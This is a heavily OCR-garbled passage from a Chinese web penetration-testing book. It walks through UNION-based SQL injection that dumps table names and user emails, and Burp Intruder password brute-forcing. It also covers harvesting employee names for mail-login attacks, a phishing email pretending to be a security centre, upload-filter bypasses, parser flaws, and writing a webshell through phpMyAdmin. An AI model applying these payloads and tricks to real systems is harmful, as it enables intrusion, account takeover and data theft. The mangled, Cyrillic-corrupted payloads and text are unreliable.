" "add time" : "1421635405" ,"discuss count":"1","topic de 
scription":"","topic pic":"","topic Тоск":0,"Тосиз coun 
":"ask","topic title":"2","add ёіте" : "3" ,"discuss count 
":"4","topic desocription":"5","topic pic":"6","topic lo 
5" "sort":"16")],"info":" Wu6210Vu529f") 


3-17 ”查询 数据 库 名 
提交 后 ， 如 图 3-18 所 示 ， 可 以 看 到 表 名 已 经 在 返回 的 信息 中 了 。 


Pragma: no-cache 
Content-Length: 908 


t("status":"1","res":[t("topic id":"1521","topic title":"", "ада time" : "14216354 
05" ," discuss соил" : "1" ,"ёоріс desoeription":"" "topic pie":"" "topic lock":0, 
"focus count":0,"user related":0,"url token" :null ,"merged ій":0,"зео title":mn 
ull,"icon":null,"pid":0,"type":"question","sort":0)j,("topic id":"aws active А 
е comments,aws article vote,aws attach,aws category ,aws draft,aws edm task,aw 
в ейт taskdata,aws edm userdata,aws edm usergroup ,aws education experience ,aw 
s favorite, ,aws favorite tag,aws feature „амз Теа" ,"topic title":"2" "add time" 
n": "1 10" u "merged id" s " 11", " seo title" ° и 12" р "icon" s " 13" ж "pid" e и та" , и гуре":" 15" ж 
изот+" : "16" }1 ч "info" зи Ха) иа 


图 3-18 成 功 返 回 表 名 
将 表 名 整理 出 来 ， 可 以 清楚 地 看 到 表 结 构 ， 如 图 3-19 所 示 。 


ан= асі1уе дата 

аи’ апзнег 

ан= апзнег сопшеп! 8 

але апсмег Папка 
aws_answer_uninterested 
але апзшег vote 

ама арргоуа1 

алас аст1уе дата 

аи’ апзнег 

ан= апзнег comments 

алас апзиег thanks 
aws_answer_uninterested 
але апзиег уоте 

ама арргоуа1 
aws_artlcle 
aws_artlcle_comments 
aws_article_vote 
aws_attach 

aws_category 

aws_draft 

aws_edm_task 
aws_edm_taskdata 
aws_edm_userdata 
aws_edm_usergroup 
aws_education_experience 
aws_favorite 
aws_favorite_tag 
aws_feature 

aws_fea 


83-19 ” 表 结 构 示意 图 
选 一 个 表 进 行 爆破 字段 ， 这 里 选 的 是 aws edm userdata， 其 hex 值 为 0x6177735f65646d 
5f7573657264617461， 因 此 构造 如 下 语句 : 
е тпотопезетесъ a group concat (distinct+column пате) ， да да 
пъ 6, 1; В; 9, 19. 11, 12, 13, 14. ТОЛЫК Оша ас зснеша. 
columns+where+table патше-0х617773516564645Е7573657264617461 + 
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结果 如 图 3-20 所 示 。 


ста: no-cache 
tent-Length: 585 


tatus":"1","res":[{"topic id":"1521","topic title":"","adc 
topic description":"","topic pic":"","topic lock":0,"focus 
11, "тегаей id":0,"seo title":null,"icon":null,"pid":0,"tyt 
topic title":"id,usergroup ‚ ета11" ‚"ааа ёіте" : "3" ,"Ятзсизз. 
_pic":"6","topic lock":"7","focus count":"8","user relatec 
seo title":"12} 
3-20 ”返回 字段 
从 结果 中 可 以 看 到 存在 id、usergroup 、email 三 个 字段 ， 这 里 只 暴露 出 email 字 段 的 
数据 ， 提 交 如 下 语句 : 
') +цпіоп+ѕе1есі+1, group concat (email, 0х2В), 3, 4, 5, 6, 7, 8, 9, 
10, 11, 12, 13, 14, 15, 16 +Егош+амз edm изегаака # 
结果 如 图 3-21 所 示 。 


("status":"1","res":[("topic id":"1521","topic title":"" "add time":"1421 
¿"topic description":"", "topic pic":"", "topic lock":0,"focus count" :0,"us 


‚21710275 
"6", "Торас Тоск":" 7" „"Тосиз count":"8","user гета ей": "9", "1г1 Токел": "10 
Те" . ! 12" n " icon" . Ш 13" š "pid" . "N 14" к Ш Туре" . " 15" я Ш gort" . " 16" 8 я Ш info" . Ш Vu6210N 


图 3-21 注入 结果 


3.2.4 注入 延伸 


在 注入 中 经 常会 碰 到 的 一 种 情况 就 是 : 注入 得 到 的 加 密 过 的 密 文 却 解 不 开 。 对 于 此 问 
题 ， 在 这 里 讲解 几 种 可 行 的 办 法 。 

(1) 利用 国外 的 搜索 引擎 ， 往 往 会 有 意 想不到 的 收获 ， 最 常见 的 是 Google。 

(2) 用 Whois 碍 出 常理 员 邮 箱 ， 然 后 发 一 份 邮件 通知 管理 员 ， 让 其 更 改 密码 。 邮 
件 内 容 无 非 类 似 于 “我 们 是 xxx 检 测 中 心 ， 您 的 网 站 存在 风险 ， 请 立即 修改 管理 员 密 


(3) 分 析 Cookie。 有 时 加 密 过 的 密 文 会 出 现在 Cookie 里 ， 对 于 这 种 情况 ， 直 接 用 管 
理 员 的 密 文 替 换 原 来 Cookie 中 的 密 文 即 可 。 

(4) 在 特定 的 注入 环境 下 ， 有 时 候 可 以 用 新 密 文 蔡 换 掉 原来 的 密 文 。 当 然 ， 这 种 方 
法 的 执行 条 件 比 较 奇 刻 ， 在 实际 中 较 少 碰见 。 

(5) 利用 找 回 密码 功能 。 第 见 的 是 利用 密 保 问题 找 回 密码 ， 对 于 这 种 情况 ， 可 以 将 
密 保 问题 答案 注入 出 来 ， 然 后 利用 找 回 密码 功能 成 功 登录 目标 账户 。 

(6) 逻辑 缺陷 。 例 如 有 些 登 录 功 能 、 修 改 找 回 密码 功能 ， 在 数据 包 中 直接 用 密 文 传 
输 。 这 时 ， 就 可 以 用 得 到 的 密 文 进行 蔡 换 ， 从 而 进行 登录 、 更 改 密码 等 操作 。 
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3.3.1 利用 Burp 进 行 爆破 


Burp 是 Web 渗 透 中 用 于 爆破 的 最 常用 的 工具 ， 其 操作 极其 简单 ， 只 需要 简单 几 步 即 可 
实现 爆破 : 抓 包 ， 设 置 变量 ， 加 载 字 典 进 行 攻击 ， 返 回信 息 。 本 节 具 体 讲述 如 何 操作 。 

(1) WA Ут, АА Мет. ина, ЯН 
站 点 。 

(2) 如 图 3-22 所 示 ， 这 里 随意 使 用 用 户 名 admin， 密 码 1234$6 登 录 ， 登 录 失 败 。 在 
Burp 中 可 以 看 到 刚才 登录 操作 的 数据 包 ， 如 图 3-23 所 示 。 


图 3-22 目标 爆破 页 面 
(3) 单 击 Burp 工 具 界 面 右 上 角 的 Action 按 钮 ， 可 以 看 到 如 图 3-24 所 示 的 下 拉 菜 单 栏 。 


й | | А 
k POST request to http:// /Login/LoginVenfty?Length=5 k= Хх. Sendto Spider 
| Previous | = Next = или | Оо ап active scan 
Е Е ши Оо a passive зсап 
інін Send to Intruder Ctrl+I 
Raw | м Send to Repeater Ctrl+R 
POST /Login/LoginVerify?Length=5 НТТРИ1.1 Send to Sequencer 
Host; 
User-Agent: Моз111а/5.0 (Windows НТ 6.1; су:319.0) Gecko/20100101 Firefox/39.D Sendto Comparer 
pt: %/% 


Sendto Decoder 


nguage: zh-CN,zh;q=D.8,en-US;q=D.5,en;q=0.3 
g Show response in browser 


application/x-www-form-urlencoded: charset=UTF-8 
X-Requested-With: XMLHttpRequest Request in browser > 
== Engagement tools F 
Copy URL 
Copy as curl command 
Copy to file 


Save item 


Convert selection к 
Cut Ctrl+X 
Copy Ctrl+C 
Paste Ctrl+V 


Message editor help 


Proxy history help 


3-23 ”登录 操作 发 送 的 数据 包 3-24 Action 下 拉 菜 单 栏 
(4) 选择 Send to Intruder， 单 击 该 命令 后 回 到 Bump 的 主 界面 ， 如 图 3-25 所 示 ， 可 以 看 到 主 
界面 的 mtruder 选 项 卡 会 加 亮 显 示 。 
(5) 切换 到 Intruder 选 项 卡 ， 单 击 Positions 选 项 ， 如 图 3-26 所 示 ， 可 以 看 到 刚才 抓 到 
的 数据 包 。 
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ТЕТІ ЛЕСЛЕСГИШШЕСІЛЕЛГ окон | comparer [Енем овом [лез ЕЕЕ 
[recon fristo] Орон 


Params | Edited | Status Length | MIME t... | Extens 
1 http-//123.249 48 9 /Login/LoginVerify?Length=5 


图 3-25 ”数据 包 成 send to intruder 
Burp Intruder Repeater Window Help 
| Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts | 
[1 | 2 | 
(Target ан] Рауісекіз | Options 


(2) Payload Positions 


Сопйдиге the positions where payloads will be Inseited into the Базе request. The attack type determines the way in which payloads are assigned іс payload 
positions - see help for full details. 


Attack type: | Sniper №) 


POST /1,041п/ LoginVverity7Lengrn=B58 HTTP/ 1.1 
Host; 


User-Agent: Mozilla/5.D (Windows МТ 6.1; rv:39.0) Gecko/20100101 Firefox/39.0 
срив ни ж/к 
Accept-Language: 21-СП,21:4<0.8,еп-03:4<-0.5,еп: 0.3 
Ассерс-Епс Виа ing; P=: deflate 
и ontent- си application/x-wgwv-form-urlencoded; charset=UTF-8 
F а With: Е ctpRequest 


летни даа 29 
ок $Р.МЕТ_5евз1їоп 14-84Е2193211в3с53хсһ00е10158 
hasan а бт ке ный -ālive 
Pragma: по-сас 
Cache-Control: no-cache 


Use rNome- 8 Us er Pp vi ~ 81288568 


BBABA Резко (бе) 
图 3-26 “登录 包 
(6) 可 以 看 到 数据 包 中 有 些 字 符 被 标注 起 来 了 ， 这 是 Bump 对 变量 的 目 动 判断 并 标注 。 
单 击 Clear $ 按钮 ， 这 里 只 对 密码 进行 字典 替换 ， 所 以 选中 123456， 然 后 单 击 Add $ 按钮 。 
(7) 如 图 3-27 所 示 ， 此 时 123456 已 经 被 设 为 变量 了 ， 接 下 来 只 需 加 载 字 典 文件 ， 对 
其 进行 奉 换 ， 并 提交 数据 包 就 可 以 进行 爆破 了 。 选 中 Payloads 选 项 卡 ， 单 击 Load 按 钮 ， 进 
行 字 典 文 件 的 加 载 。 


Content-Length: 29 

Cookie: АЅР.МЕТ 5езз10п19<41211321133)053)хс!00езо)Б 
Connection: keep-alive 

Pragma: no-cache 

Cache-Control: no-cache 


UserName=admin&UserPvd=8S1234568] 


| ? || < | + | > | Туре а search term 


3-27 设置 爆破 变量 
(8) 如 图 3-28 所 示 ， 字 和 典 文件 加 载 完 毕 ， 便 可 以 进行 爆破 了 。 选 中 最 上 方 Intruder 选 
项 卡 ， 单 击 Start attack 命 令 ， 如 图 3-29 所 示 。 
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[2] Payload Options [Simple list] 


a simple list of strings that are used as payloads 


111111 
222222 
к 333333 
444444 
555555 
656556 

777177 


3-28 ”字典 文件 成 功 加 载 


Е Burp Suite Professional v1.5.18 - licensed to |аггу жи 


ШАТ Repeater Window Help 


Save attack config 
? | Load attack config 


Copy attack config b number of payload sets depends on the attack type defined in the Positions tab. Various payload types аге | 
New tab behavior bad type сап Бе customized in different ways. | 


Automatic payload positions 
Conñgure predefined payload lists 


Payload count: 22 


р Request count: 22 


图 3-29 ”准备 开始 爆破 
(9) 这 时 可 以 看 到 返回 信息 在 不 停 深 动 。 待 字典 跑 完 后 ， 分 析 返 回 数 据 Length， 找 
出 正确 密码 。 如 图 3-30 所 示 ， 是 目标 站 点 的 爆破 结果 ， 可 以 看 到 除了 admin 人 返回 的 Length 
是 370， 其 他 的 都 是 354， 因 此 判断 admin 为 正确 密码 。 
ES ooo 


000000 
123455 
554321 
88888888 
abcdeig 
admin 
admin123 
admin888 
adminabc 
abc123 


口 
口 
z 
О 
О 
О 
Ü) 
e 
Ы 
О 
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POST /Login/LoginVerify?Length-5 НТТР/1.1 


3-30 ”爆破 结束 
Tips: 可 以 通过 Length 值 的 排序 来 快速 找 出 数值 不 同 的 项 。 
当然 ， 如 今 很 多 Web 站 点 都 有 验证 码 。 但 是 ， 验 证 码 依 旧 存 在 被 绕 过 的 风险 ， 利 用 
Python Image Library、Tesseract-OCR、Ppytesser 这 几 个 Python 第 三 方 库 ， 仅 二 值 化 、 文 字 分 
割 两 个 选项 就 能 轻松 识别 互联 网 60% 以 上 的 验证 码 。 


3.3.2 ”爆破 在 大 型 Web 站 点 渗透 中 的 作用 


在 对 大 型 Web 站 点 的 渗透 中 ， 一 般 不 会 直接 将 目标 放 到 主 站 上 ， 而 是 从 子 站 入 手 。 大 
家 都 知道 ， 一 个 大 型 站 点 一 定 有 些 内 部 人 员 登 录 的 系统 。 而 对 于 这 类 系统， 安全 往往 掌握 
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在 用 户 手 里 ， 因 为 很 多 安全 公司 认为 某 个 系统 只 有 固定 的 一 些 内 部 账号 能 登录 ， 而 其 里 面 
的 一 些 操作 引发 的 安全 问题 便 不 是 那么 重要 了 ， 因 此 开发 中 常常 会 有 很 多 疏忽 。 这 种 情况 
下 ， 内 部 人 员 密 码 的 强 弱 就 显得 格外 重要 ， 但 是 弱 口 令 仍 是 常 发 生 的 问题 。 

就 拿 内 部 邮件 系统 来 说 ， 不 妨 假设 渗透 目标 是 某 著 名 网 络 安 全 公司 A， 其 域名 是 www. 
aaa.com， 通 过 二 级 域名 的 爆破 ， 发 现 了 其 内 部 邮件 系统 mailaaa.com。 大 家 都 知悉 ， 一 般 
企业 邮箱 的 格式 都 为 : 用 户 名 @ 公 司 的 域名 ， 所 以 这 里 登录 的 账号 格式 应 该 是 : 用 户 名 @ 
aaa.com。 接 下 来 ， 可 以 用 搜索 引擎 对 @aaa.com 进 行 搜索 ， 很 快 便 可 以 发 现 用 户 名 的 命名 
规则 ， 而 一 般 都 是 以 员工 姓名 拼写 作为 用 户 名 。 

接 下 来 ， 答 试用 怜 虫 将 搜索 引擎 能 搜索 到 的 员工 名 字 都 肘 下 来 ， 搭 建 过 交互 站 点 的 人 
都 知道 ， 如 果 不 对 密码 的 复杂 度 作 要 求 ， 总 会 有 些 人 使 用 123436、88888888 这 样 的 弱 口 令 
作为 密码 ， 而 爆破 就 是 利用 这 一 特性 。 所 以 尽 可 能 多 地 搜集 其 员工 的 名 字 。 

当 员 工 名 字 搜 集 完 毕 以 后 ， 便 可 以 将 其 做 成 用 户 名 的 字典 文件 ， 然 后 选取 一 些 最 常见 
的 弱 口 令 ， 将 密码 设 为 不 变量 ， 用 户 名 设 为 变量 ， 从 而 进行 用 户 名 的 爆破 。 

当成 功 地 爆破 出 某 个 账户 的 账号 、 密 码 后 ， 尝 试 利 用 人 的 惰性 和 密码 的 通用 性 通 杀 其 
他 系统 ， 可 以 大 大 提高 渗透 效率 。 
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在 Web 渗 透 中 ， 后 台 文 件 的 利用 常常 会 有 意 想 不 到 的 效果 。 而 一 个 网 站 后 台 路 人 径 的 骏 
露 就 等 同 于 将 家 的 具体 位 置 给 暴露 了 ， 为 了 杜绝 这 种 现象 发 生 ， 开 发 人 员 经 常 采用 复制 的 
后 台 路 径 ， 给 渗透 市 来 了 难度 。 那 癌 见 的 后 台地 址 碍 找 方 法 又 有 哪些 呢 ? 


3.4.1 后 台地 址 查找 


1. ана. ЛЕН 


种 见 的 后 台 扫 描 顺 是 用 外 载 字 典 对 路 径 进 行 爆破 ， 而 这 种 方法 的 局 限 性 也 很 明显 ， 字 和 典 的 
强度 决定 了 成 功率 。 而 相 比 较 而 言 ， 爬 虫 贡 向 能 怜 出 那些 很 隐秘 的 目录 ， 增 加 爆破 的 成 功率 。 


2. 搜索 引擎 


对 于 后 人 台 查 找 ， 和 常用 的 语法 无 非 intext、inurl、intitle 等 最 基本 的 搜索 语法 ， 人 简单 又 实 
Я, АУРИХ. 


3. 页 面 信息 
在 火狐 浏览 器 中 访问 一 个 Web 站 点 ， 在 浏览 器 空白 界面 右 击 ， 单 击 “ 但 看 页 面 信 
恩 ”， 效 果 如 图 3-31 所 示 。 


МДҮ ЧА жазтенжнт 


https://www.baidu.com/favicon.ico 
https://www.baidu.com/img/baidu.svg 
https://www.baidu.com/img/bd_logo1.png 


https://www.baidu.com/img/baidu_jgylogo3.gif 


жайы: https://www.baidu.com/favicon.ico 
类 型 : X-ICON ве 

大 小 : 1.07 КВ (1,092 字 节 ) 

尺寸 : 16px x 16px 


C] ВШЕВ www.baidu.com #8 
айна : | ЖА) 另存 为 (A)... 


图 3-31 查看 页 面 信息 
在 媒体 页 面 信 息 中 可 以 看 到 多 媒体 文件 路 径 ， 包 括 图 片 等 的 路 径 。 因 为 这 些 图 片 往往 
是 管理 员 在 后 台 更 新 时 上 传 的 ， 而 有 些 Web 站 点 的 上 传 目 录 分 配 不 严格 ， 如 上 传 目录 是 后 
台 目 录 的 子 目 录 ， 所 以 导致 了 后 台 路 径 就 隐藏 在 图 片 路 径 中 。 


4. XSS 
XSS 的 危害 十 分 巨大 却 又 常 沼 被 忽略 ， 我 们 在 第 5 章 会 详细 讨论 更 多 的 前 端 技术 。 
5. 二 级 域名 及 其 他 端口 


在 对 大 型 网 站 进行 渗透 时 ， 常 常 发 现 一 个 现象 。 比 如 从 目标 站 点 的 一 个 二 级 域名 入 手 
进行 Web 渗 透 ， 但 其 后 台 登 录 接 口 往 往 是 男 一 个 二 级 域名 或 三 级 域名 。 因 此 在 渗透 中 用 脚 
本 对 目标 站 点 的 二 级 域名 进行 爆破 还 是 很 有 必要 的 。 

其 他 端口 又 怎么 样 呢 ? 一 般 Web 站 点 默认 端口 是 80 端 口 ， 但 在 实际 渗透 中 ， 常 常会 发 
现 某 个 站 点 前 台 确 实 是 80 端 口 ， 而 后 台 登 录 端 口 往往 是 其 他 端口 ， 像 8000、8080、8001 都 
很 常见 。 所 以 ， 在 渗透 前 对 目标 的 信息 搜集 要 尽量 到 位 和 全 面 ， 以 免 渗 透 中 为 此 浪费 大 量 
时 间 和 精力 。 


6. 访问 来 源 


此 方法 对 一 些 有 留言 板 或 是 能 和 管理 员 交 互 的 站 后 较为 肥效 。 前 先 ， 需 要 准备 一 个 目 
己 的 站 点 ， 然 后 在 此 站 点 中 添加 站 长 统计 的 JS， 将 准备 的 站 点 网 址 以 添加 友 链 的 名 义 发 给 
渗透 目标 的 管理 员 。 当 渗透 目标 的 管理 员 访 问 了 发 给 他 的 网 址 时 ， 这 时 在 站 长 统计 后 台 便 
能 看 到 访问 来 源 了 ， 而 一 般 管 理 员 是 在 后 台 对 一 些 留言 进行 审核 ， 所 以 访问 来 源 常 第 就 是 
后 台地 址 。 

在 开发 中 ， 后 台 是 为 了 方便 管理 员 对 网 站 进行 更 新 ， 因 此 功能 往往 很 多 ， 如 添加 管 
理 员 ， 数 据 库 备 份 下 载 ， 文 件 上 传 等 。 功 能 强大 ， 伴 随 而 来 的 第 利 是 安全 问题 。 在 渗 
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透 中 ， 对 后 台 的 巧妙 利用 更 胜 于 在 前 台大 费 周章 地 挖 据 漏 洞 。 那 常见 的 后 台 利 用 又 有 哪 
些 呢 ? 


342 后 台 验 证 绕 过 


渗透 中 ， 有 些 Web 站 点 的 后 台 使 用 了 JavaScript 验 
证 和 固定 cookie， 而 这 类 验证 被 绕 过 的 可 能 性 很 大 。 


就 拿 JavaScript 验 证 来 说 ， 因 为 它 发 生 在 客户 端 ， 因 此 非法 操作 ， 请 先 登录 后 再 进行 操作 1 
对 于 这 类 后 台 只 要 在 浏览 器 中 把 JavaScript 禁 止 掉 就 
能 正常 访问 后 台 了 。 例 如 ， 蓝 科 CMS 中 对 后 台 的 验证 
就 是 JavaScript， 如 图 3-32 所 示 ， 可 以 看 到 JS 开启 的 时 


候 ， 无 法 访问 后 人 台 。 图 3-32 ”JS 脚本 对 权限 进行 了 验证 
当 把 火狐 浏览 器 的 javascript.enabled 设 置 为 false 时 ， 再 次 对 后 台 进 行 访问 ， 如 图 3-33 所 
示 ， 可 以 看 到 成 功 访问 了 后 台 ， 轻 松 地 绕 过 了 JavaScript 的 验证 。 


图 3-33 成 功 进入 后 台 
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局 部 未 授权 访问 是 很 多 后 台 出 现 的 问题 ， 意 思 就 是 后 台中 的 茶 个 页 面 可 以 被 访问 。 最 
币 见 的 关 似 于 管理 员 管 理 、 数 据 库 操作 、 文 件 上 传 之 类 ， 从 而 引发 任意 添加 管理 员 、 数 据 
涝 露 、getshell 等 严重 问题 。 而 当面 对 后 台 里 那些 非 高 危 的 越权 时 ， 应 该 怎么 办 呢 ? 


1. 越权 XSS 
对 于 一 些 低 危 的 后 台 越 权 ， 开 发 者 们 常常 不 怎么 重视 ， 而 往往 问题 都 是 出 在 小 问题 
上 。 大 多 数 情况 下 ， 后 台 相 比 前 台 要 脆弱 太 多 ， 很 多 后 台 XSS、 后 台 注 入 之 类 ， 在 开发 
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者 、 攻 击 者 眼中 很 “鸡肋 ”， 但 是 如 果 将 其 与 越权 结合 起 来 ， 其 实质 就 和 前 人 台 的 漏洞 差 
不 多 。 例 如 网 站 基本 信息 页 面 的 越权 ， 单 从 越权 角度 来 看 确实 没什么 影响 ， 无 非 是 一 些 
公司 名 之 类 的 。 但 是 如 果 攻 击 者 在 基本 信息 中 插入 XSS 代 码 ， 那 危害 性 甚至 超过 了 前 台 
的 XSS。 


2. 越权 注入 


后 台中 常常 也 有 很 多 数据 库 胡 询 ， 如 新 闻 搜 索 与 会 员 操 作 等 。 其实， 对 数据 库 的 任何 
操作 都 有 可 能 引发 注入 ， 而 往往 后 台 本 身 有 很 多 注入 ， 但 后 台 经 常 忽 视 。 例 如 新 闻 管 理 页 
面 的 越权 ， 无 论 是 新 闻 的 删除 、 添 加 、 修 改 或 搜索 都 要 对 数据 库 进 行 操 作 ， 如 果 开 发 者 因 
为 其 是 后 台 而 未 做 过 滤 或 过 滤 不 足 的 话 ， 那 危害 可 想 而 知 。 


344 后 台 文 件 的 利用 


对 于 后 台 文 件 的 利用 ， 第 见 的 有 文件 上 传 、 备 份 下载 、 数 据 库 下 载 、robots.txt、 探 针 
和 等， 这些 文件 带 来 的 影响 有 大 有 小 ， 上 人 至 getshell， 下 人 至 信息 泄漏 。 对 于 后 台 文 件 扫描 ， 只 
需要 留意 某 些 特定 的 后 级 即 可 ， 如 rar、txt、mdb、sgl 等 ， 这 样 能 大 大 节省 扫描 时 间 ， 提 高 
效率 。 
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文件 上 传 是 最 常见 的 getshell 方 法 之 一 。 而 文件 上 传 的 验证 大 致 可 以 分 为 两 类 : YG 
验证 和 服务 端 验证 ， 在 这 里 讲解 常见 的 上 传 验证 的 统 过 。 


3.5.1 钊 见 的 验证 方式 及 统 过 


1. JavaScript 验 证 绕 过 


JavaScript 验 证 就 是 所 谓 的 客户 并 验证 ， 也 是 最 脆弱 的 一 种 验证 。 直 接 修 改 数据 包 或 
禁用 JavaScript 即 可 绕 过 。 


2. content-type 验 证 绕 过 


content-type 验 证 ， 最 常见 的 是 判断 content-type 是 否 为 image/gif。 对 于 这 种 验证 直接 修 
改 数据 包 中 的 content-type 为 Image/gif 即 可 ， 如 图 3-34 所 示 。 


3. 黑 名 单 检 测 绕 过 
黑 名 单 检 测 是 常见 的 一 种 上 传 验 证 方式 ， 不 允许 上 传 黑 名 单 中 存在 的 扩展 名 ， 其 安全 
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性 低 于 日 名 单 检 测 ， 对 其 的 绕 过 方式 也 远 多 于 白 名 单 检测 。 对 于 黑 名 单 检测 绕 过 的 常见 思 
路 有 以 下 几 种 。 

(1) 找 黑 名 单 拓展 名 中 的 漏网 之 鱼 ， 种 见 的 如 asa、cer。 

(22 大 小 写 混 清 绕 过 ， 如 AsP、pHp。 

(3) 利用 解析 漏洞 绕 过 。 

(4) 特别 文件 名 构造 。 

(5) 截断 上 传 。 


Cookie: PHPSESSID=pf8tvcbhbes3u0q7km7cb7q9d3s6 
Connection: keep-alive 
Eontent-Type: image/gif; 


2929179416656 


2929179416656 
Content-Disposition: form-data; name="news title" 


3-34 修改 content-type 


4 日 名 单 检 测 绕 过 


日 名 单 检 测 安 全 性 远 融 于 黑 名 单 检 测 ， 仅 允许 上 传 白 名 单 所 允许 的 几 种 扩展 名 ， 因 此 
黑 名 单 中 的 大 小 写 混淆 、 特 殊 的 扩展 名 等 绕 过 方式 对 白 名 单 检 测 均 无 效 。 但 仍 可 以 用 截断 
上 传 、 解 析 漏 洞 、 特 别 文 件 名 构造 对 其 进行 绕 过 。 


5. 对 危险 扩展 名 POST 检 测 的 绕 过 


在 开发 中 ， 为 了 方便 维护 和 更 新 ， 会 先 对 扩展 名 进行 验证 ， 如 果 上 传 文件 的 扩展 名 为 
可 执行 脚本 ， 便 会 对 其 POST 的 数据 进行 检测 ， 如 果 存 在 恶意 代码 就 会 禁止 上 传 。 而 对 于 
这 类 上 传 检测 的 绕 过 大 臻 有 这 几 种 思路 ， 一 是 利用 变种 木马 绕 过 其 检测 ， 二 就 是 用 包含 文 
件 对 其 进行 绕 过 。 就 命 PHP 来 说 ， 先 将 一 句 话 木马 放 进 一 个 txt 文 件 中 ， 因 为 txt 并 非 可 执行 
脚本 ， 因 此 成 功 上 传 ， 然后 再 将 如 图 3-35 所 示 的 代码 放 进 一 个 PHP 文 件 中 ， 加 载 外 部 xx.txt 
文件 。 
<?php 
include 'хх.їхї'; 
э 
83-35 ”加 载 外 部 x х :txt 文件 
利用 PHP 中 的 include 函 数 将 刚才 上 传 的 txt 文件 包含 进去 ， 而 因 PHP 中 include 是 芝 用 函 
数 ， 一 般 POST 检 测 不 会 认为 其 是 恶意 代码 ， 因 此 成 功 上 传 ， 从 而 绕 过 限制 执行 恶意 代码 。 


6. 服务 器 目录 限制 的 绕 过 


有 的 Web 应 用 程序 本 身 对 扩展 名 并 没有 什么 验证 ， 而 是 在 服务 器 上 对 上 传 目 录 人 允许 上 
传 的 文件 扩展 名 进行 限制 。 而 对 于 这 类 防御 方法 ， 如 果 能 控制 上 传 路 径 即 能 成 功 绕 过 了 。 
其 中 最 第 见 的 便 是 上 传 路 径 被 写 在 了 数据 包 中 ， 对 此 直接 修改 数据 包 即 可 ， 如 图 3-36 所 
示 ， 这 里 用 ../ 跳 出 被 限制 的 目录 。 
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img 

ЕЕ гаҒсь24с0832 
Content-Disposition: form-data; name= uppath” 
гаў 

— T тағсь24с0832 


Сопіепі-ріѕроѕіїіоп: form-data; пале- Submit” 


83-36 直接 修改 上 传 路 径 
还 有 些 不 常见 的 ， 直 接 在 文件 名 前 加 ../ 进 行 目录 的 跳出 ， 如 图 3-37 所 示 。 


533 

----------------------------- 2929179416656 
Content-Disposition: form-data; name="img thumb"; 
Ё11епате="../2.рНр" 


Content-Type: арр11сас1оп/оссес-зскеат 


图 3-37 ”构造 特殊 文件 名 跳出 当前 目录 
3.5.2 具体 剖析 一 些 绕 过 手法 


1. 截断 上 传 


常见 的 截断 就 是 利用 %00 或 %80-%99 对 文件 名 进行 截断 从 而 绕 过 验证 。 在 Burp 中 可 以 
修改 其 hex 值 进行 截断 ， 如 图 3-38 所 示 。 


----------------------------- 2929179416656 
Сопсепс-різрозісіоп: form-data; name="img thumb"; 
filename="1 php; Jpg" 

Content-Type: application/octet-stream 


图 3-38 ”构造 特殊 文件 名 
将 文件 名 中 的 hex 值 替换 为 00， 如 图 3-39 和 图 3-40 所 示 。 


0 20 бе b1 bd b5 за 22 by bd т-дага; name= Im 
22 3b 20 66 69 бс 65 бе 61 gthumb ;fena 

ә 6 то D |2 ба 70 67 22 04 me="1php; jpg" 

в 14 24 54 79 70 65 За 20 61 ContentType:a 

4 69 66 6 2 6 63 74 65 74 pplication/octet 

3 0а 0a 04 Oa 04 0а 22 22 2d -stream 一 

d 24 2 24 24 24 2 24 24 24 


^а ^а мт: г гт MAMMA 4 2 


3-39 分 号 的 位 置 


----------------------------- 2929179416656 
Сопсепс-різрозісіоп: form-data; name="img thumb"; filename="|L.phpõ0.jpg" 
Content-Type: application/octet-stream 


3-40 ”hex 值 成 功 被 修改 
2. 解析 漏洞 


某 些 Web 应 用 程序 对 上 传 后 的 文件 没有 进行 重 命名 。 对 此 ， 可 以 尝试 用 一 些 解 析 漏 洞 
进行 绕 过 。 
(1) 15 6.0 解 析 漏 洞 
利用 IIS 6.0 解 析 漏 洞 的 方法 有 两 种 : 目录 解析 和 文件 解析 。 对 于 目录 解析 ， 其 原理 
是 在 网 站 下 建立 名 字 为 x.asp、x.asa 的 文件 夹 ， 其 目录 内 任何 扩展 名 的 文件 都 被 IIS 当 作 
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ASP 文 件 来 解析 并 执行 ， 如 /xx.asp/xx.jpg，xx.jpg 会 被 当 作 ASP 执 行 。 对 于 文件 解析 ， 如 
xx.asp; .jpg， 分 号 后 面 的 不 被 解析 ， 因 此 等 同 于 xx.asp。 
(2) Nginx 解 析 漏 洞 
在 默认 Fast-CGI 开 局 状况 下 ， 上 传 一 个 含有 恶意 代码 的 图 片 ， 其 URL 如 : xxx.com/xx. 
jpg。 当 访问 Xxx.com/Xxx.jpg/.php 时 ， 原 本 的 xx.jpg 便 会 被 当 作 php 执 行 了 。 
(3) Nginx <8.03 衬 字 节 代码 执行 漏洞 
在 上 传 的 图 片 中 插入 恶意 代码 ， 然 后 通过 访问 Xxx.jpg%00.php 来 执行 其 中 的 代码 。 
(4) Араспей Br 38 E] 
Apache 是 从 右 到 左 开始 判断 解析 ， 如 果 为 不 可 识别 解析 ， 就 再 往 左 判断 ， 比 如 
xx.php.owf.rar 中 .owf 和 .rar 这 两 种 后 级 是 Apache 不 可 识别 解析 ，Apache 就 会 把 xx.php.owf. 
rar 解 析 成 php。 


3. 特别 文件 名 构造 


在 黑 合 中， 对 于 一 些 不 合 规范 的 上 传 验证 ， 常 常会 出 现 一 些 罪 夷 所 思 的 绕 过 。 例 如 : 
xx.php“.”jpg、xx.php 等 ， 对 于 这 类 验证 ， 在 黑 盒 环境 下 常常 需要 进行 大 量 尝 试 。 


3.6 ”getshell 的 其 他 万 式 


文件 上 传 是 getshell 的 主要 方式 之 一 ， 除 了 文件 上 传 ， 其 实 还 有 很 多 其 他 的 getshell 的 
方式 。 


1. phpMyAdmin 
利用 弱 口 令 登 录 phpMyAdmin， 访 问 http://URL/phpmyadmin/libraries/select lang.lib. 
php， 可 以 得 到 目标 站 点 的 物理 路 径 ， 然 后 选择 一 个 数据 库 ， 运 行 以 上 MySQL 语句 : 


Create TABLE а (сша text МОТ NULL); 
Insert INTO a (cmd) VALUES (") ; 
select спа from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php'; 


Prop TABLE ТЕ ЕХІ5Т5 а; 


这 些 语句 的 运行 效果 如 下 : 

运行 第 一 条 语句 在 选 定 的 数据 库 中 建 一 个 表 a; 运行 第 二 条 语句 将 PHP 一 句 话 木 
